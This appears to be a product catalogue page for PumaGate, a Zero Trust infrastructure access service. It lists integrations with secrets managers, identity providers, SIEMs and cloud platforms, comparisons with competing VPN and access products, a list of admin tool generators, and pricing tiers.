- On-call schedule-based access - Access alerts and incidents - Just-in-time access during incidents - Runbook integration - Event orchestration - Access request escalation - PagerDuty Events API v2 - Schedule sync for access policies Use cases: - Grant production access to on-call engineers - Alert on failed access attempts - Incident-triggered access provisioning - Escalation for access requests # HashiCorp Vault Category: Secrets Management Dynamic credential injection with HashiCorp Vault for just-in-time secrets. Features: - Dynamic database credentials - certificate authority - Just-in-time credential injection - Lease management and renewal - AppRole and JWT authentication - Namespace support - Transit encryption engine - Vault Enterprise support Use cases: - Eliminate static database credentials - certificates instead of keys - Time-limited credential access - Centralized secrets management # AWS Secrets Manager Category: Secrets Management Retrieve and inject credentials from AWS Secrets Manager for AWS-native deployments. Features: - Secret retrieval via IAM roles - Cross-account secret access - Resource-based policies - Secrets versioning - AWS PrivateLink support - KMS encryption integration - CloudTrail audit logging Use cases: - AWS-native secrets management - RDS and Aurora credential injection - Cross-account database access - Just-in-time credential retrieval # Slack Category: Communication Access request notifications and approvals through Slack for instant team communication. Features: - Access request notifications - Interactive approval buttons - Security alert channels - Session recording alerts - Slash commands for access status - Channel-based team routing - Block Kit rich messages - Slack Enterprise Grid support Use cases: - Real-time access request notifications - One-click approvals for just-in-time access - Security alert distribution - Team-based access workflows # Microsoft Teams Category: Communication Access notifications and approvals through Microsoft Teams for Microsoft-centric organizations. Features: - Incoming webhook notifications - Adaptive Card approvals - Teams channel routing - Security alert cards - Bot-based interactions - Team-based approval workflows - Message actions for quick access - Microsoft 365 integration Use cases: - Microsoft 365-native access workflows - Teams-based approval routing - Real-time security notifications - Cross-team access visibility # AWS Category: Cloud Platform Secure access to AWS EC2, RDS, and other resources without exposing them to the internet. Features: - EC2 instance access via SSM-less connections - RDS and Aurora database access - EKS cluster access - VPC-native deployment options - IAM role-based authentication - AWS PrivateLink support - Cross-account access - CloudTrail integration Use cases: - Secure EC2 access without public IPs - RDS access without VPN or bastion - Multi-account AWS access management - EKS cluster administration # Google Cloud Category: Cloud Platform Secure access to GCE, Cloud SQL, and GKE without exposing resources publicly. Features: - GCE instance access - Cloud SQL database connections - GKE cluster access - VPC-native deployment - Service account authentication - Private Google Access support - Multi-project access - Cloud Audit Logs integration Use cases: - Secure GCE access in private VPCs - Cloud SQL without public IP - GKE administration access - Cross-project resource access # Microsoft Azure Category: Cloud Platform Secure access to Azure VMs, Azure SQL, and AKS with Entra ID integration. Features: - Azure VM access (SSH and RDP) - Azure SQL database connections - AKS cluster access - VNet-native deployment - Entra ID authentication - Private Endpoint support - Cross-subscription access - Azure Activity Log integration Use cases: - Windows VM access via Linux proxy (no direct RDP exposure) - Azure SQL without public endpoint - AKS administration access - Hybrid cloud access management # Ping Identity Category: Identity Provider Enterprise SSO and adaptive authentication with Ping Identity for secure Zero Trust access to infrastructure. Features: - PingFederate SAML 2.0 and OIDC federation - PingOne Cloud SSO support - Adaptive MFA with PingID - SCIM user and group provisioning - Risk-based authentication policies - Directory integration with PingDirectory Use cases: - Federate enterprise identity for infrastructure access - Enforce adaptive MFA on privileged sessions - Automate user provisioning and deprovisioning via SCIM - Apply context-aware access policies based on risk score # Keycloak Category: Identity Provider Open-source SSO and identity federation with Keycloak for self-hosted Zero Trust authentication. Features: - SAML 2.0 and OIDC SSO integration - User federation from LDAP and Active Directory - Realm-based multi-tenancy support - Group and role synchronization - Custom authentication flows - Self-hosted identity with full data sovereignty Use cases: - Self-hosted SSO for restricted or regulated environments - Federate LDAP and Active Directory identities for infrastructure access - Enforce custom authentication flows for privileged sessions - Map Keycloak realm roles to PumaGate RBAC policies - Maintain full data sovereignty with on-premise identity # CyberArk Vault Category: Secrets Management Privileged credential retrieval from CyberArk Vault for enterprise-grade secrets injection. Features: - Central Credential Provider (CCP) integration - Conjur secrets retrieval support - Just-in-time privileged credential injection - Credential rotation policy compliance - Safe-based access control mapping - Dual-control approval workflows Use cases: - Inject vaulted credentials into database sessions without exposing passwords - Enforce credential rotation policies across all managed resources - Integrate privileged access workflows with CyberArk safe policies - Eliminate standing privileged accounts on infrastructure - Satisfy audit requirements with end-to-end credential tracking # Sumo Logic Category: SIEM Cloud-native log analytics and SIEM with Sumo Logic for real-time access event intelligence. Features: - HTTP Hosted Collector integration - Structured JSON event forwarding - Real-time access dashboards - Cloud SIEM correlation rules - Field extraction for access events - Scheduled compliance report generation Use cases: - Correlate infrastructure access events with application logs - Detect anomalous access patterns with Cloud SIEM analytics - Generate compliance reports for SOC 2 and ISO 27001 audits - Build real-time dashboards for security operations teams # IBM QRadar Category: SIEM Enterprise SIEM integration with IBM QRadar for advanced threat detection on infrastructure access. Features: - Syslog and LEEF event forwarding - QRadar REST API integration - Custom DSM log source support - Offense correlation with access events - Compliance reporting for PCI DSS and HIPAA - Network activity baseline integration Use cases: - Correlate access events with network-level threat intelligence - Trigger QRadar offenses on unauthorized access attempts - Generate regulatory compliance reports from access audit data - Integrate infrastructure access into existing SOC workflows - Detect lateral movement through access pattern analysis # ServiceNow Category: ITSM IT service management integration with ServiceNow for automated access request ticketing and approval workflows. Features: - Automated access request ticket creation - Multi-level approval workflows - CMDB integration for resource inventory - Change management integration - SLA tracking for access provisioning - ServiceNow REST API and MID Server support Use cases: - Route access requests through ServiceNow approval workflows - Track access provisioning SLAs in ServiceNow dashboards - Sync infrastructure resources with ServiceNow CMDB - Integrate access changes with change management processes - Audit access requests with ServiceNow ticket history # Opsgenie Category: Incident Management Incident-driven access management with Opsgenie for on-call alerting and escalation workflows. Features: - Alert creation via Opsgenie REST API - On-call schedule-based access provisioning - Escalation policy triggers on access violations - Incident-scoped temporary access grants - Team-based alert routing - Opsgenie integration with Jira Service Management Use cases: - Alert on-call teams on failed access attempts or policy violations - Grant temporary production access during active incidents - Escalate unacknowledged access requests through Opsgenie policies - Route access alerts to the correct team based on resource ownership # New Relic Category: Observability Full-stack observability with New Relic for monitoring infrastructure access performance and security events. Features: - Event API and Log API integration - Custom dashboards for access metrics - NRQL queries on access event data - Alert conditions for access anomalies - Infrastructure agent correlation - Service level objective tracking for access latency Use cases: - Monitor access session latency and connection health - Correlate infrastructure access with application performance metrics - Set alert conditions on unusual access patterns or failures - Build unified dashboards spanning application and access telemetry - Track access SLOs alongside application SLOs # CrowdStrike Category: Endpoint Security Device trust and endpoint posture verification with CrowdStrike Falcon for context-aware access control. Features: - Falcon Zero Trust Assessment (ZTA) score integration - Device posture verification before access - Endpoint compliance checks for managed devices - Real-time threat intelligence from Falcon sensors - Conditional access based on device risk score - CrowdStrike Falcon API integration Use cases: - Block access from endpoints with active threats detected by Falcon - Enforce minimum ZTA scores for privileged resource access - Verify endpoint compliance before granting database connections - Correlate endpoint risk with infrastructure access policies - Restrict access from unmanaged or non-compliant devices # SailPoint Category: Identity Governance Identity governance and access certification with SailPoint for lifecycle management and compliance. Features: - Access certification campaign integration - Entitlement synchronization with IdentityNow - Separation of duties policy enforcement - Automated joiner-mover-leaver workflows - Role mining and access recommendations - Compliance reporting for SOX and GDPR Use cases: - Automate periodic access certification reviews for infrastructure - Enforce separation of duties across database and server access - Synchronize role-based entitlements from SailPoint to PumaGate - Streamline joiner-mover-leaver processes for infrastructure access - Generate governance reports for regulatory compliance audits ## Comparisons # PumaGate vs Teleport Teleport — Infrastructure access platform Compare browser-based Zero Trust access with certificate-based infrastructure access. # PumaGate vs StrongDM StrongDM — Infrastructure access platform Compare browser-based access and visual session recordings with client-based access. # PumaGate vs Tailscale Tailscale — WireGuard-based VPN mesh Compare Zero Trust gateway access with VPN mesh for infrastructure security. # PumaGate vs HashiCorp Boundary HashiCorp Boundary — Identity-based access management Compare managed Zero Trust access with self-hosted identity-based access. # PumaGate vs Cloudflare Access Cloudflare Access — Zero Trust network access Compare purpose-built infrastructure access with broad Zero Trust network access. # PumaGate vs CyberArk CyberArk — Privileged access management Compare modern cloud-native access with traditional enterprise PAM. # PumaGate vs Fortinet VPN (FortiClient) Fortinet VPN (FortiClient) — Traditional VPN & endpoint security Compare true Zero Trust per-resource access with traditional VPN — plus how PumaGate differs from Fortinet's own ZTNA. # PumaGate vs Forcepoint VPN Client Forcepoint VPN Client — Traditional VPN client with network-level access Compare PumaGate's Zero Trust gateway with Forcepoint's VPN client — and see how both differ from Forcepoint's own Zero Trust solution. # PumaGate vs Zscaler Private Access (ZPA) Zscaler Private Access (ZPA) — Cloud-based Zero Trust network access (ZTNA) Compare PumaGate's session-level Zero Trust with Zscaler ZPA's connection-level access — and see why session recording changes everything. # PumaGate vs Cisco VPN (AnyConnect / Secure Client) Cisco VPN (AnyConnect / Secure Client) — Traditional VPN client with network-level access Compare PumaGate's Zero Trust gateway with Cisco AnyConnect — the world's most deployed VPN client — and see why Zero Trust is fundamentally safer. # PumaGate vs Sophos Connect Sophos Connect — Traditional VPN client for Sophos Firewall Compare PumaGate's architecture-level Zero Trust — browser-based, agentless, per-resource access — with Sophos Connect's VPN approach and Sophos ZTNA. # PumaGate vs Ubiquiti Teleport Ubiquiti Teleport — Hardware-based remote access VPN Compare PumaGate's Zero Trust per-resource gateway with Ubiquiti Teleport's hardware-dependent network VPN — and see why Zero Trust is fundamentally safer. # PumaGate vs Palo Alto GlobalProtect VPN Palo Alto GlobalProtect VPN — Enterprise VPN tied to next-gen firewalls Compare PumaGate's architecture-level Zero Trust — browser-based, per-resource access with full session recording — with Palo Alto's appliance-dependent GlobalProtect VPN and Prisma Access ZTNA. # PumaGate vs BeyondTrust BeyondTrust — Privileged access management platform Compare PumaGate's lightweight Zero Trust gateway with BeyondTrust's enterprise PAM suite — and see how modern access differs from legacy PAM. # PumaGate vs Delinea (Thycotic) Delinea (Thycotic) — Privileged access management and secrets Compare PumaGate's unified Zero Trust gateway with Delinea's Secret Server and Connection Manager — modern access vs traditional PAM. # PumaGate vs Twingate Twingate — Software-defined Zero Trust network access Compare PumaGate's browser-based, session-recorded access with Twingate's client-based network access — and see why session-level control matters. # PumaGate vs Netskope Private Access Netskope Private Access — SASE platform with private access Compare PumaGate's focused Zero Trust gateway with Netskope's SASE-embedded private access — purpose-built vs part of a larger platform. # PumaGate vs NordLayer NordLayer — Business VPN and Zero Trust access Compare PumaGate's session-level Zero Trust with NordLayer's VPN-first approach — and see how per-resource access with audit trails changes security. # PumaGate vs Keeper Security Keeper Security — Password management and PAM Compare PumaGate's Zero Trust access gateway with Keeper's connection manager — and see how integrated SSO, recording, and Zero Trust differ from vault-based access. # PumaGate vs Pritunl Pritunl — Open-source VPN server Compare PumaGate's Zero Trust per-resource access with Pritunl's network-level VPN — and see why session recording and identity-based access change security fundamentally. ## Tools # SSH Config Builder Visual SSH config generator with ProxyJump chains, wildcard patterns, and hardening best practices # OpenSSH Hardening Generator sshd_config generator with security profiles for different OS and OpenSSH versions # Database Connection String Builder Connection string generator for PostgreSQL, MySQL, MongoDB, Redis, SQL Server with code snippets # Linux User Provisioning Generator Generate idempotent Linux user setup scripts with SSH keys, sudo policies, and group membership # Firewall Rules Generator Define access policies and export as iptables, nftables, ufw, AWS Security Group, or Terraform rules # Access Review Report Builder Generate quarterly audit reports with automated findings for SOC 2, HIPAA, and PCI-DSS # SSH Key Inventory Auditor Analyze SSH public keys for algorithm strength, duplicates, and security recommendations # Compliance Access Control Mapper Cross-reference access control requirements across SOC 2, HIPAA, PCI-DSS, ISO 27001, and NIST 800-53 # Incident Response Playbook Generator Step-by-step response procedures for access-related security incidents # Infrastructure Attack Surface Analyzer Risk-scored assessment of exposed services with prioritized hardening roadmap # AD User Audit PowerShell Generator PowerShell scripts to list Active Directory users by activity within configurable time windows # AD Password Reset PowerShell Generator Bulk password reset scripts for Active Directory users with group filtering and policy controls # AD Authentication Audit PowerShell Generator PowerShell scripts to list authentication events for AD users across Domain Controllers # AD User Creation PowerShell Generator Create fully-configured Active Directory users with all attributes in single or bulk CSV mode # AD Hardening Audit PowerShell Generator Comprehensive Active Directory security assessment aligned with CIS Benchmarks and NIST 800-53 # LDAP Authentication with OpenSSH Guide Complete guide to LDAP authentication for OpenSSH using SSSD, PAM, and public key lookup # RBAC Policy Generator Define roles, permissions, and resource access rules. Export as JSON, YAML, or policy documents # Zero Trust Readiness Assessment Evaluate your organization's Zero Trust readiness with scored assessment and recommendations # SSH Login Banner Generator Create legal warning banners for /etc/issue, /etc/motd, and sshd_config with compliance templates # Network ACL Generator Build access control lists for iptables, AWS Security Groups, Azure NSG, and GCP firewall rules # Password Policy Generator Create enterprise password policies with complexity rules, rotation schedules, and compliance mappings # MFA Readiness Assessment Evaluate MFA deployment readiness with recommendations for methods, rollout, and user communication ## Pricing ### Solo — $9/per month Annual: $9/per month For a single user. 1 user users, 15 resources resources, 14-day retention retention. - SSH access with session recording - Secure Network Access (1 peer) - Basic SSO & MFA enforcement - Audit logs & native CLI - Basic alerting & email notifications - 15 resources, 14-day retention ### Team — $19/per user / month Annual: $15/per user / month, billed annually For teams of any size. Multi-user users, 200 resources resources, 30-day retention retention. - Everything in Solo, plus: - Multi-user organisation - RDP, Database & Web App access - SAML/OIDC SSO & Teams RBAC - Secure Network Access (5 peers) - Audit log export, API & Terraform - Basic alerting & notifications (Email, Slack, Discord, Teams) - 200 resources, 30-day retention ### Business — $29/per user / month Annual: $22/per user / month, billed annually For compliance-ready teams. Multi-user users, ∞ resources resources, 90-day retention retention. - Everything in Team, plus: - Kubernetes API proxy & kubectl exec recording - gRPC-aware proxy with per-method ACL - Telnet gateway with session recording - Just-in-Time access & approval workflows - Dedicated gateways - Unlimited resources, network access & web apps - Security policies (reauth, idle timeout, MFA) - Advanced alerting & all notification channels - SOC 2, SIEM & compliance reports - Session risk analysis & endpoint posture - 500 GB storage, 90-day retention - Priority support ### Enterprise — Custom/ Full control at scale. Multi-user users, ∞ resources resources, 1-year retention retention. - Everything in Business, plus: - Unlimited resources & network access peers - Kubernetes cluster auto-discovery - HIPAA & compliance attestation - Dedicated deployment managed by PumaGate - 1-year retention, 2 TB+ storage - SLA-backed dedicated support